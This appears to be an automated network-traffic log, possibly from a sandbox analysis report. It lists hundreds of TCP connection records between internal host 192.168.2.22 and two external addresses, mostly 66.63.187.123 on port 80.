Source: global traffic TCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
